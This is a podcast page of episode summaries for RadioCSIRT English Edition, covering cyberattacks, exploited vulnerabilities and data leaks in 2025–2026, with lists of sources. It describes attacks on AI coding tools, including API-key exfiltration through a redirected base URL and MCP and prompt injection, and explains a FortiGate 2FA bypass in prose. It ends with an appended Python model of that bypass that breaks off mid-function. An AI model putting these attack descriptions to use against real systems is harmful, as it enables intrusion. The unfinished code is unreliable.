RadioCSIRT - English Edition
Author: Marc Frédéric GOMEZ
© Marc Frédéric GOMEZ
Description
🎙 Marc Frédéric Gomez, cybersecurity expert, brings you daily insights into the latest threats, attacks, and defense strategies you need to know.
🔎 On the agenda:
✔️ Analysis of cyberattacks and critical vulnerabilities
✔️ Strategic intelligence for CSIRTs, CERTs, and cybersecurity professionals
✔️ Sources and references to dive deeper into each topic
💡 Why listen to RadioCSIRT?
🚀 Stay up to date in just a few minutes a day
🛡️ Anticipate threats with reliable, technical information
📢 An essential intelligence source for IT and security professionals
🔗 Listen, share, and secure your environment!
📲 Subscribe and leave a ⭐ rating on your favorite platform!
72 Episodes
We open this recap with the Winter Olympic Games in Milano Cortina, facing a wave of cyberattacks attributed to Russia. According to The Register, Italy’s Minister of Foreign Affairs confirmed the targeting of diplomatic offices and Olympic infrastructure. The defensive posture is further strained by supply chain tensions, as Cloudflare’s CEO threatened to withdraw pro bono protection services following a regulatory dispute with Italian authorities.

In France, ZDNet reported an espionage case in Gironde involving a clandestine interception station operated from a rented Airbnb property. Two Chinese nationals were charged. The seized equipment was designed for sniffing Starlink communications and intercepting military frequencies, illustrating direct risk at the physical communications layer.

We then move to active exploitation and emergency response requirements around Cisco Catalyst SD-WAN. Australia’s cyber authorities published an alert on exploitation of Cisco SD-WAN appliances. CISA added CVE-2026-20127 and CVE-2022-20775 to the Known Exploited Vulnerabilities catalog and issued Emergency Directive 26-03, requiring immediate inventory, forensic artifact collection, patching, and compromise assessment, with a deadline of February 27, 2026. CERT-FR confirmed active exploitation through alert CERTFR-2026-ALE-002, and BleepingComputer reported exploitation activity dating back to 2023.

On the malware front, multiple campaigns highlight attacker focus on routers, developers, and stealth tooling. Cisco Talos detailed the dismantling of the DKnife interception framework used since 2019. Talos also documented the Dohdoor backdoor campaign using DNS over HTTPS through Cloudflare, delivered via DLL sideloading and process hollowing, with EDR bypass techniques involving syscall unhooking in ntdll.dll.

Kaspersky GReAT reported Arkanix Stealer operating as Malware-as-a-Service, with both Python and C++ implementations, AES-GCM communications, and indications of LLM-assisted development.

Developer ecosystems remain a key battleground. Microsoft warned of fake Next.js repositories used as job interview lures delivering in-memory JavaScript payloads, and GitLab banned 131 accounts linked to the Contagious Interview operation and the Wagemole scheme. Socket identified the SANDWORM_MODE campaign abusing at least 19 malicious npm packages through typosquatting, including a module targeting AI coding assistants via malicious MCP server injection combined with prompt injection.

We also cover phishing at industrial scale. As reported by KrebsOnSecurity, the Starkiller phishing-as-a-service platform dynamically loads real login pages and acts as a reverse proxy, relaying keystrokes, form submissions, and session tokens through attacker infrastructure, effectively defeating multi-factor authentication by capturing the full authentication flow.

Finally, critical vulnerabilities affected AI development environments. Check Point Research documented vulnerabilities in Anthropic’s Claude Code enabling command execution via project hooks, MCP consent bypass through project configuration, and clear-text exfiltration of Anthropic API keys by redirecting the ANTHROPIC_BASE_URL variable to an attacker-controlled endpoint.

In parallel, Linux ecosystem updates included Linux 7.0 entering release candidate status, while incident response and law enforcement actions included Eurojust’s takedown of a fraudulent call centre in Dnipro.

All sources are available on https://www.radiocsirt.com/podcast/your-cybersecurity-news-for-saturday-february-28-2026-ep-71/

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
We open this weekly recap with a critical alert regarding the active exploitation of a Microsoft Office zero-day, CVE-2026-21509. According to CERT-UA, the Russian-linked group APT28 has integrated this flaw into phishing campaigns targeting Ukrainian administrations and several EU nations, utilizing a complex infection chain involving WebDAV and the Covenant post-exploitation framework. In a simultaneous blow to software supply chains, the official update mechanism for Notepad++ was hijacked by the state-sponsored actor Violet Typhoon to distribute malware. While threats against productivity tools rise, Mozilla is pivoting toward privacy by announcing that Firefox 148 will allow users to centrally disable all generative AI features.

The infrastructure landscape faced significant pressure this week as CISA issued a binding operational directive requiring federal agencies to retire all End-of-Life (EoL) equipment within 12 months, citing their role as persistent entry points for edge-based attacks. Meanwhile, the AISURU botnet shattered global records by launching a hyper-volumetric DDoS attack peaking at 31.4 Tbps, fueled by 2 million compromised Android devices. On the regulatory front, the European Commission warned TikTok of potential fines reaching 6% of its global turnover for violating the Digital Services Act (DSA) through "addictive by design" features, while U.S. authorities successfully seized major piracy domains operated from Bulgaria.

Regarding cyber-extortion, the group Scattered Lapsus ShinyHunters continues to defy traditional ransomware models by combining data theft with physical harassment and social engineering. In Germany, authorities warned of Signal account takeovers targeting high-profile individuals via fraudulent QR code pairing.

To counter evolving threats, Microsoft unveiled a new scanner designed to detect backdoors within Large Language Models (LLMs), and the UK’s NCSC provided a strategic reality check on Cloud Security Posture Management (CSPM), emphasizing that while vital, these tools are only one piece of the broader cloud security puzzle.

Sources

Saturday, January 31, 2026
Clubic – https://www.clubic.com/actualite-598390-data-centers-ce-que-revele-la-premiere-reunion-a-bercy-sur-les-projets-en-cours-et-a-venir-en-france.html
The Record – https://therecord.media/bulgaria-piracy-sites-streaming-gaming-seized-us
Unit 42 – https://unit42.paloaltonetworks.com/russian-cyberthreat-2026-winter-olympics/
CERT Santé – https://cyberveille.esante.gouv.fr/alertes/grafana-cve-2026-21720-2026-01-29
SANS ISC – https://isc.sans.edu/diary/rss/32668

Sunday, February 1, 2026
Google TAG – https://blog.google/threat-analysis-group/tag-bulletin-q4-2025/
CERT-FR – https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0102/
BleepingComputer – https://www.bleepingcomputer.com/news/security/mandiant-details-how-shinyhunters-abuse-sso-to-steal-cloud-data/
The Hacker News – https://thehackernews.com/2026/01/iran-linked-redkitten-cyber-campaign.html

Monday, February 2, 2026
The Register – https://www.theregister.com/2026/02/02/russialinked_apt28_microsoft_office_bug/
The Hacker News – https://thehackernews.com/2026/02/notepad-official-update-mechanism.html
BleepingComputer – https://www.bleepingcomputer.com/news/software/mozilla-will-let-you-turn-off-all-firefox-ai-features/
SANS ISC – https://isc.sans.edu/diary/rss/32674

Tuesday, February 3, 2026
Zscaler ThreatLabz – https://www.zscaler.com/blogs/security-research/technical-analysis-anatsa-campaigns-android-banking-malware-active-google
EFF – https://www.encryptitalready.org/
Centre canadien pour la cybersécurité – https://www.cyber.gc.ca/fr/alertes-avis/bulletin-securite-kubernetes-av26-078

Wednesday, February 4, 2026
CERT-FR – https://www.cert.ssi.gouv.fr/cti/CERTFR-2026-CTI-001/
NCSC – https://www.ncsc.gov.uk/blog-post/cspm-silver-bullet-or-another-piece-in-the-cloud-puzzle
The Hacker News – https://thehackernews.com/2026/02/microsoft-develops-scanner-to-detect.html
CISA – https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalog

Thursday, February 5, 2026
The Record – https://therecord.media/cisa-gives-federal-agencies-one-year-end-of-life-devices
The Hacker News – https://thehackernews.com/2026/02/aisurukimwolf-botnet-launches-record.html
The Register – https://www.theregister.com/2026/02/05/asia_government_spies_hacked_37_critical_networks/
BleepingComputer – https://www.bleepingcomputer.com/news/security/hackers-compromise-nginx-servers-to-redirect-user-traffic/

Friday, February 6, 2026
KrebsOnSecurity – https://krebsonsecurity.com/2026/02/please-dont-feed-the-scattered-lapsus-shiny-hunters/
BleepingComputer – https://www.bleepingcomputer.com/news/security/european-commission-says-tiktok-facing-fine-over-addictive-design/
BleepingComputer – https://www.bleepingcomputer.com/news/security/germany-warns-of-signal-account-hijacking-targeting-senior-figures/
CISA – https://www.cisa.gov/news-events/alerts/2026/02/05/cisa-adds-two-known-exploited-vulnerabilities-catalog

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
This week, the vulnerability floodgates opened. From an 11-year-old Telnet flaw to critical VMware exploits, the CISA KEV catalog is overflowing. But the biggest shocker? Operational security failures at the highest levels of government.

In this episode of RadioCSIRT English Edition:
🚨 Critical Patch Overload: A massive week for the CISA KEV catalog, featuring Oracle, VMware vCenter (CVSS 9.8), and a critical bypass in Fortinet.
🦖 The Return of Sandworm: ESET uncovers "DynoWiper," a new malware targeting the Polish energy sector, marking the 10th anniversary of the Ukraine grid attack.
🤖 OpSec Failures: The CISA Acting Director leaks classified docs to ChatGPT, and why your BitLocker keys might not be safe with Microsoft.
🕸️ Botnet Consolidation: The Kimwolf botnet grows, potentially merging with Badbox 2.0 to control millions of Android devices.
🇫🇷 Digital Sovereignty: France bids farewell to Teams and Zoom, deploying its sovereign "Visio" platform government-wide.

Tune in for your weekly dose of critical cybersecurity intelligence.
🔗 Links & Resources: https://www.radiocsirt.com/podcast/ep-69-cisas-kev-surge-sandworm-returns-the-chatgpt-leak/
We open this weekly recap with a massive Patch Tuesday from Microsoft, which addressed 114 vulnerabilities, including three zero-days; notably, CVE-2026-20805 is actively exploited in the wild. Infrastructure concerns continued as Cisco patched a critical AsyncOS zero-day exploited by Chinese APT actors, and AWS remediated a "CodeBreach" supply chain flaw in its console CI pipelines.

In data privacy and regulation, France’s CNIL imposed a combined $48 million fine on Free and Free Mobile for security failures affecting 24 million subscribers. Meanwhile, Spanish energy giant Endesa disclosed a breach exposing the data of 22 million customers, and a massive scraping incident affected 17.5 million Instagram users.

On the threat landscape, Check Point Research analyzed "Sicarii," a new ransomware operation likely acting as a false flag with confused ideological messaging. Physical "Quishing" (QR code phishing) campaigns are surging in France, and the infamous BreachForums hacking community suffered a taste of its own medicine with a leak of its user database.

Finally, strategic cooperation strengthens as the UK unveils its Government Cyber Action Plan and Germany partners with Israel to build a "Cyber Dome" defense system.

OSINT Sources:

📊 Reports, Studies & Strategies
Kaspersky Security Bulletin 2025 : https://www.kasbersky.com/about/press-releases/2025_kaspersky-financial-sector-faced-ai-blockchain-and-organized-crime-threats-in-2025
SecurityScorecard (via KnowBe4) : https://www.knowbe4.com/hubfs/Financial-Sector-Threats-The-Shifting-Landscape.pdf
ENISA Threat Landscape 2025 : https://www.enisa.europa.eu/publications/enisa-threat-landscape-2025
FS-ISAC : https://www.fsisac.com/knowledge/annual-navigating-cyber-2025-report
RESCO Courtage : https://www.resco-courtage.com/dora-reglementation-guide-complet-2025
NCSC UK : https://www.ncsc.gov.uk/blog-post/government-cyber-action-plan-strengthening-resilience-across-uk

🛡️ Vulnerabilities, Patch Tuesday & Security Advisories
Microsoft Security Update Guide : https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0628
CISA (CVE-2025-8110) : https://www.cisa.gov/news-events/alerts/2026/01/12/cisa-adds-one-known-exploited-vulnerability-catalog
CISA (CVE-2026-20805) : https://www.cisa.gov/news-events/alerts/2026/01/13/cisa-adds-one-known-exploited-vulnerability-catalog
CERT-FR (MISP) : https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0030/
CERT-FR (VMware) : https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0029/
CERT-FR (MariaDB) : https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0028/
CERT-FR (NetApp) : https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0027/
CERT-FR (Google Pixel) : https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0026/
Krebs on Security : https://krebsonsecurity.com/2026/01/patch-tuesday-january-2026-edition/
Cisco Talos Intelligence : https://blog.talosintelligence.com/microsoft-patch-tuesday-january-2026/
CERT Santé : https://cyberveille.esante.gouv.fr/alertes/palo-alto-cve-2026-0227-2026-01-15
BleepingComputer (Cisco AsyncOS) : https://www.bleepingcomputer.com/news/security/cisco-finally-fixes-asyncos-zero-day-exploited-since-november/
CyberPress (AWS Console) : https://cyberpress.org/aws-console-supply-chain-attack-github-hijackingcyber/

⚠️ Data Leaks, Incidents & Attacks
BleepingComputer (BreachForums) : https://www.bleepingcomputer.com/news/security/breachforums-hacking-forum-database-leaked-exposing-324-000-accounts/
CyberPress (Instagram) : https://cyberpress.org/instagram-data-leak/
Cybersecurity Dive (SitusAMC) : https://www.cybersecuritydive.com/news/hackers-steal-sensitive-data-major-banking-industry-vendor-situsamc/
BleepingComputer (Endesa) : https://www.bleepingcomputer.com/news/security/spanish-energy-giant-endesa-discloses-data-breach-affecting-customers/
BleepingComputer (Pax8) : https://www.bleepingcomputer.com/news/security/cloud-marketplace-pax8-accidentally-exposes-data-on-1-800-msp-partners/
The Record (Anchorage Police) : https://therecord.media/anchorage-police-takes-servers-offline-after-third-party-attack

🕵️ Threat Intelligence (APT, Ransomware, Phishing)
Planet.fr (Quishing Scam) : https://www.planet.fr/societe-arnaque-a-la-fausse-carte-bancaire-par-courrier-le-mecanisme-du-quishing-qui-vise-vos-coordonnees.2992374.29336.html
Check Point Research (Sicarii) : https://research.checkpoint.com/2026/sicarii-ransomware-truth-vs-myth/
Cisco Talos Intelligence (UAT-8837) : https://blog.talosintelligence.com/uat-8837/
Malwarebytes (LinkedIn Phishing) : https://www.malwarebytes.com/blog/news/2026/01/phishing-scammers-are-posting-fake-account-restricted-comments-on-linkedin

⚖️ Regulations, Sanctions & International Cooperation
The Record (CNIL/Free Fine) : https://therecord.media/france-data-regulator-fine
Malwarebytes (Datamasters Fine) : https://www.malwarebytes.com/blog/news/2026/01/data-broker-fined-after-selling-alzheimers-patient-info-and-millions-of-sensitive-profiles
The Record (Germany-Israel Deal) : https://therecord.media/germany-cyber-dome-israel

🏛️ Institutional: AMSN / Monaco Special
AMSN : https://amsn.gouv.mc/decouvrir-l-amsn/presentation
CERT-MC : https://amsn.gouv.mc/cert-mc
Prince's Government (Directory) : https://www.gouv.mc/Gouvernement-et-Institutions/Le-Gouvernement/Ministere-d-Etat/Agence-Monegasque-de-Securite-Numerique
Légimonaco : https://legimonaco.mc/tnc/ordonnance/2015/12-23-5.664/
ANSSI / cyber.gouv.fr : https://cyber.gouv.fr/actualites/signature-dun-nouveau-programme-de-cooperation-entre-lagence-monegasque-de-securite
Prince's Government (FIRST Conference) : https://www.gouv.mc/Action-Gouvernementale/La-Securite/Actualites/L-Agence-Monegasque-de-Securite-Numerique-participe-a-la-36eme-conference-annuelle-du-Forum-of-Incident-Response-and-Security-Teams

Don’t think, just patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
We open this episode with a new physical mail scam campaign targeting bank customers in France, according to Planet.fr. The modus operandi begins with the receipt of a letter bearing the letterhead of a financial institution and containing a fake bank card equipped with a chip. The document instructs the recipient to scan a QR code to activate the card. This technique, known as “quishing,” redirects the victim to a malicious website designed to exfiltrate personal data and banking details. The phenomenon, already observed in neighboring European countries, is gaining ground in France. The cards display a high level of counterfeiting, including accurate reproduction of banks’ visual identities. Verifying the URL displayed after scanning the QR code is the first indicator of legitimacy. If information is entered on a fraudulent website, the recommended procedure includes immediately blocking the bank card, changing all passwords, and reporting the incident via the French Interior Ministry’s Perceval platform.

Microsoft published CVE-2026-0628 in its Security Update Guide, concerning a high-severity vulnerability affecting Chromium’s WebView tag component, according to Neowin. The technical flaw, classified as “Insufficient policy enforcement,” allows an attacker who has convinced a user to install a malicious extension to inject scripts or HTML into a privileged page. Researcher Gal Weizman reported the vulnerability to Google in late November. Chrome version 143.0.7499.192 contains the upstream fix, which was integrated by Microsoft into Edge on January 10, 2026. Microsoft records the CVE in its Security Update Guide to provide authoritative downstream status to Edge customers. Canonical vulnerability trackers confirm that the upstream remediation threshold was set in the Chrome 143 stable release. Inventory and remediation efforts must cover all embedded Chromium runtimes and Electron applications, as updating the host browser does not protect these applications.

The BreachForums hacking forum suffered a data leak exposing its user database table, according to BleepingComputer. On January 9, 2026, a site named after the ShinyHunters extortion gang published a 7Zip archive named breachedforum.7z. The archive contains the file databoose.sql, a MyBB database table comprising 323,988 member records, including display names, registration dates, IP addresses, and other internal information. Analysis shows that the majority of IP addresses resolve to a local loopback address, but 70,296 records contain public IP addresses. The latest registration date corresponds to August 11, 2025, the day the previous BreachForums was shut down following the arrest of certain alleged operators. The current administrator, known under the pseudonym N/A, acknowledged the leak, stating that a backup of the MyBB users table was temporarily exposed in an unsecured directory and downloaded once.

Finally, a major data leak compromised the personal information of approximately 17.5 million Instagram users, according to CyberPress. The leak, initially reported by cybersecurity researchers at Malwarebytes, exposes contact information, making millions of users vulnerable to identity theft and targeted phishing attacks. The dataset appeared this week on a hacking forum, published by a threat actor using the pseudonym “Solonik.” The listing titled “INSTAGRAM.COM 17M GLOBAL USERS — 2024 API LEAK” contains 17.5 million records formatted in JSON and TXT files. The data was collected in late 2024 via an API leak that bypassed standard security measures. The exposed database includes full names, usernames, verified email addresses, phone numbers, user identifiers, and partial location data. The leak is classified as scraping, meaning automated data collection via public interfaces. As of January 10, 2026, Meta has not issued a formal statement regarding this leak.

Sources
Planet.fr – Bank card scam: https://www.planet.fr/societe-arnaque-a-la-fausse-carte-bancaire-par-courrier-le-mecanisme-du-quishing-qui-vise-vos-coordonnees.2992374.29336.html
Microsoft Security Update Guide – CVE-2026-0628: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-0628
BleepingComputer – BreachForums database leak: https://www.bleepingcomputer.com/news/security/breachforums-hacking-forum-database-leaked-exposing-324-000-accounts/
CyberPress – Instagram data leak: https://cyberpress.org/instagram-data-leak/

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
We open this edition with a global overview of the current cyber threat landscape. The year 2025 confirms a high and persistent level of cyber pressure on organizations, characterized by the convergence of critical technical vulnerabilities, structural dependencies on suppliers, and growing geopolitical tensions. Sector-wide analyses highlight a continuous expansion of attack surfaces, increased exploitation of digital supply chains, and sustained professionalization of malicious actors, whether criminal or state-sponsored.

We then move on to an in-depth analysis of the financial sector, facing a dual structural threat. Reports from Kaspersky, ENISA, FS-ISAC, and KnowBe4 converge on a clear conclusion: nearly all major financial institutions have been affected by incidents involving third-party providers. This systemic exposure is accompanied by an intensification of geopolitically motivated attacks and APT operations targeting international banking infrastructures, notably for state financing or intelligence collection purposes.

We also revisit several documented incidents illustrating this dynamic. The compromise of the banking vendor SitusAMC highlights the cascading effects of supply chain attacks. The attack claimed by the pro-Russian group NoName057(16) against La Poste fits into a logic of symbolic disruption linked to geopolitical tensions. Other recent cases reported by specialized media confirm the sustained exposure of the financial sector to attacks combining organized cybercrime and state-level objectives.

Finally, we address the regulatory and organizational response to these threats. The DORA regulation represents a structuring step for the operational resilience of the European financial sector, but feedback shows that compliance alone is not sufficient to counter determined adversaries. Mastery of digital dependencies, visibility over third and fourth parties, and the strengthening of detection and response capabilities remain central challenges to limit systemic impact.

Sources:

Sectoral Reports and Threat Analyses:
Kaspersky Security Bulletin 2025 - Financial Sector: https://www.kaspersky.com/about/press-releases/2025_kaspersky-financial-sector-faced-ai-blockchain-and-organized-crime-threats-in-2025
ENISA Threat Landscape 2025 - Finance Sector: https://www.enisa.europa.eu/publications/enisa-threat-landscape-2025
FS-ISAC - Navigating Cyber 2025: https://www.fsisac.com/knowledge/annual-navigating-cyber-2025-report
KnowBe4 - Financial Sector Threats: The Shifting Landscape: https://www.knowbe4.com/hubfs/Financial-Sector-Threats-The-Shifting-Landscape.pdf

Documented Incidents and Compromises:
Cybersecurity Dive - SitusAMC Banking Vendor Breach: https://www.cybersecuritydive.com/news/hackers-steal-sensitive-data-major-banking-industry-vendor-situsamc/
The Record (Recorded Future) - NoName057(16) Attack on La Poste: https://therecord.media/pro-russian-hackers-claim-attack-french-postal-service-la-poste
American Banker - Marquis Breach (Carter Pape): https://www.muckrack.com/carter-pape/articles

Attribution and State Threat Actors:
Security Affairs - France Links APT28 to Government Attacks: https://securityaffairs.com/171234/apt/france-links-russian-apt28-attacks.html

Compliance and Regulation:
RESCO Courtage - Complete DORA Guide 2025: https://www.resco-courtage.com/dora-reglementation-guide-complet-2025
L'Usine Digitale - 2025 Cyberattacks and Lessons Learned: https://www.usine-digitale.fr/article/les-cyberattaques-qui-ont-marque-l-annee-2025-et-les-lecons-a-en-tirer.html

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
We open this episode with a critical vulnerability in n8n reported by Security Online. CVE-2025-68668, with a CVSS score of 9.9, allows an authenticated user to escape the Python sandbox of the automation platform to execute arbitrary system commands, turning the Code Node into a vector for complete host system compromise.

CVEfeed.io reports an uncontrolled DLL loading flaw in AsusSoftwareManagerAgent. CVE-2025-12793, rated 8.5 in CVSS 4.0, exploits an untrusted search path allowing a local attacker to execute arbitrary code through DLL namespace manipulation.

Clubic covers the disappearance of Anna's Archive's primary domain. The registry placed annas-archive.org under serverHold status two weeks after uploading 300 terabytes of Spotify data, suggesting legal action by the Public Interest Registry following OCLC's lawsuit for extracting 2.2 terabytes of WorldCat data.

Phoronix reports a critical situation for the Debian project: the three delegated members of the Data Protection Team resigned simultaneously, leaving the project without an active team to manage GDPR obligations. Project leader Andreas Tille now handles this role ad hoc while awaiting new volunteers.

Finally, CERT-FR issued advisory CERTFR-2026-AVI-0004 concerning CVE-2025-13699 affecting multiple MariaDB branches. The vendor has not specified the exact nature of the security issue but recommends updating to versions 10.11.15, 10.6.24, 11.4.9, or 11.8.4.

Sources:
Security Online – n8n CVE-2025-68668: https://securityonline.info/n8n-sandbox-escape-how-cve-2025-68668-turns-workflows-into-weapons/
CVEfeed.io – CVE-2025-12793 ASUS: https://cvefeed.io/vuln/detail/CVE-2025-12793
Clubic – Anna's Archive domain: https://www.clubic.com/actualite-593797-le-site-qui-avait-pirate-spotify-perd-son-nom-de-domaine.html
Phoronix – Debian Data Protection Team: https://www.phoronix.com/news/No-Debian-Data-Protection-Team
CERT-FR – MariaDB Vulnerability: https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0004/

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
Welcome to your daily cybersecurity podcast.

We open this edition with an analysis published by FIRST.org on December 29, 2025, presenting the annual review of vulnerability forecasts for the year 2025. The article, written by Éireann Leverett, confirms the validation of Vuln4Cast project forecasts with 49,183 CVEs published as of December 29, falling within the confidence interval of 41,142 to 49,868 CVEs established in February 2025. The MAPE of 1.39% against the upper bound demonstrates excellent accuracy of the forecast models.

The quarterly forecasts for Q4 2025 are also validated with 12,359 CVEs published, within the confidence interval of 11,815 to 14,129 CVEs. This accuracy below 5% demonstrates that quarterly forecasts are sufficiently reliable for operational planning by patch management teams, SOCs, and CERTs.

The article highlights the expansion of the vulnerability forecasting ecosystem with CVEForecast.org developed by Jerry Gamblin at Cisco using XGBoost, and CIRCL Luxembourg's Vulnerability-Lookup platform which adds sightings tracking and comprehensive statistics. Future developments will focus on forecasting vendor distributions, CVSS vectors, CWEs, and vulnerability exploitability. Improvements are underway in six areas: CWE root cause analysis, exploit prediction, exploitation prediction, CNA forecasting, CVSS vector forecasting, and CVSS score prediction.

FIRST announces the VulnOptiCon 2026 conference in Luxembourg, hosted by CIRCL, to enable the community to share methodologies and collectively advance exposure science and predictive security.

Source
FIRST – 2025 Vulnerability Forecast Annual Review: https://www.first.org/blog/20251229-Vulnerability-Forecast-Review

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
Welcome to your daily cybersecurity podcast.

We open this edition with several security advisories published by CERT-FR regarding critical vulnerabilities affecting major components of the Linux ecosystem and enterprise environments. The bulletins notably concern Ubuntu, Red Hat, and IBM products, which are exposed to flaws that may allow privilege escalation, arbitrary code execution, or compromise of confidentiality. These vulnerabilities affect widely deployed components in server and cloud infrastructures, highlighting the need for rigorous patch management in critical environments.

We then analyze a vulnerability affecting the Roundcube webmail, referenced as CVE-2025-68461. This flaw allows a remote attacker to exploit input handling mechanisms in order to compromise session security or execute malicious code in the context of the targeted user. Given the widespread use of Roundcube in email infrastructures, this vulnerability represents a significant risk for Internet-exposed organizations.

Finally, we review a security vulnerability patched by Microsoft, identified as CVE-2025-13699. This flaw affects a Windows system component and may be exploited to bypass security mechanisms or gain elevated privileges. Microsoft has released fixes through its update guide and recommends prompt application to reduce the risk of active exploitation.

Sources
CERT-FR – Ubuntu vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1139/
CERT-FR – Red Hat vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1141/
CERT-FR – IBM product vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1137/
Roundcube vulnerability – CVE-2025-68461: https://cyberveille.esante.gouv.fr/alertes/roundcube-cve-2025-68461-2025-12-26
Microsoft – CVE-2025-13699: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13699

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
Welcome to your daily cybersecurity podcast.

We open this edition with a case combining cybercrime and intelligence activities in Eastern Europe. In Georgia, the former head of counterintelligence has been arrested as part of an investigation into large-scale scam centers. Authorities suspect he facilitated or protected structured fraud operations targeting international victims, once again highlighting the convergence of organized crime, corruption, and cyber fraud.

We then analyze a phishing campaign targeting cryptocurrency users through fake emails impersonating Grubhub. The messages promise a tenfold return on cryptocurrency sent by victims. Funds are immediately redirected to attacker-controlled wallets with no possibility of recovery, illustrating a classic yet still highly effective use of social engineering applied to digital assets.

Finally, we examine an operation attributed to Evasive Panda, a China-linked threat actor, which conducted espionage activities using a hijacked DNS infrastructure. The attackers leveraged advanced DNS resolution and traffic redirection techniques to deliver stealthy malicious payloads while bypassing multiple network detection mechanisms. This campaign highlights the continued evolution of APT tradecraft in state-sponsored cyber espionage.

Sources
Arrest in Georgia – scam centers: https://therecord.media/republic-of-georgia-former-spy-chief-arrested-scam-centers
Crypto phishing campaign – fake Grubhub emails: https://www.bleepingcomputer.com/news/security/fake-grubhub-emails-promise-tenfold-return-on-sent-cryptocurrency/
Evasive Panda APT – malicious DNS infrastructure: https://thehackernews.com/2025/12/china-linked-evasive-panda-ran-dns.html

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
Welcome to your daily cybersecurity podcast.

We open this edition with a geopolitical sequence marking a new phase in transatlantic tensions over digital regulation. The United States has imposed visa restrictions on several European figures involved in regulating technology platforms, including Thierry Breton, former European Commissioner. Washington justifies the decision by accusing European regulators of extraterritorial censorship, notably in the enforcement of the Digital Services Act. The European Union condemned the measure and requested formal explanations, calling it an attack on its regulatory sovereignty.

We then analyze CVE-2018-25154, a critical buffer overflow vulnerability affecting GNU Barcode version 0.99. The flaw, linked to the Code 93 encoding mechanism, enables arbitrary code execution through crafted input files. The CVSS 3.1 score is critical at 9.8, with high impact on confidentiality, integrity, and availability.

We also review CVE-2023-36525, an unauthenticated blind SQL injection affecting the WPJobBoard WordPress plugin up to version 5.9.0. The vulnerability is remotely exploitable without privileges or user interaction and exposes affected sites to data leakage and persistent modification risks.

In the cybercrime segment, the FBI seized the web3adspanels.org infrastructure, used as a backend to centralize stolen banking credentials from phishing campaigns. The infrastructure enabled account takeover operations against financial institutions and remained active until late 2025.

We then cover Urban VPN Proxy, a free VPN browser extension whose recent versions intercept and exfiltrate AI platform conversations, including prompts, responses, and session metadata, with the behaviour enabled by default.

Finally, we address the active exploitation of CVE-2020-12812 on FortiGate firewalls, an older SSL VPN vulnerability still abused to bypass two-factor authentication. The flaw comes from an inconsistency in username case handling: the LDAP backend authenticates a username submitted with different letter case, but the case-sensitive match against the FortiGate user entry that enforces the second factor fails, so the user is never prompted for it. Practitioners should confirm affected FortiGate units are on a fixed FortiOS build and review SSL VPN logins whose username case differs from the configured account.

Sources:
Tech regulation and USA–EU tensions: https://www.01net.com/actualites/pourquoi-les-etats-unis-sattaquent-a-thierry-breton-et-aux-autres-regulateurs-de-la-tech.html
CVE-2018-25154 – GNU Barcode buffer overflow: https://cvefeed.io/vuln/detail/CVE-2018-25154
CVE-2023-36525 – WPJobBoard blind SQL injection: https://cvefeed.io/vuln/detail/CVE-2023-36525
FBI seizure – web3adspanels.org: https://securityaffairs.com/186094/cyber-crime/fbi-seized-web3adspanels-org-hosting-stolen-logins.html
Urban VPN Proxy data harvesting: https://boingboing.net/2025/12/19/this-free-vpn-is-a-massive-security-risk.html
FortiGate 2FA bypass exploitation: https://cyberpress.org/hackers-abuse-3-year-old-fortigate-flaw/

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
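The FortiGate item above describes a bug class worth seeing in code: two lookups for the same username that disagree on case. The block below is an added example and not FortiOS code; the dictionaries stand in for an LDAP directory that matches usernames case-insensitively and for the per-user entries that carry the second-factor requirement, and every name and secret in it is constructed. The vulnerable login shows the bypass, the hardened login canonicalizes once and fails closed.

```python
"""Model of the 2FA bypass failure mode described in the FortiGate item.

Added example, not FortiOS code. DIRECTORY models an LDAP server that matches
sAMAccountName case-insensitively; TWO_FACTOR_USERS models the local user
entries that say which second factor applies. All values are constructed.
"""
from dataclasses import dataclass

# Constructed data. The directory is queried case-insensitively (as Active
# Directory does); the policy table is keyed by the exact configured username.
DIRECTORY = {"alice": "correct-horse-battery-staple", "svc-backup": "backup-pass"}
TWO_FACTOR_USERS = {"alice": "fortitoken", "svc-backup": "none"}


def ldap_bind(username: str, password: str) -> bool:
    """Directory bind: the username comparison is case-insensitive."""
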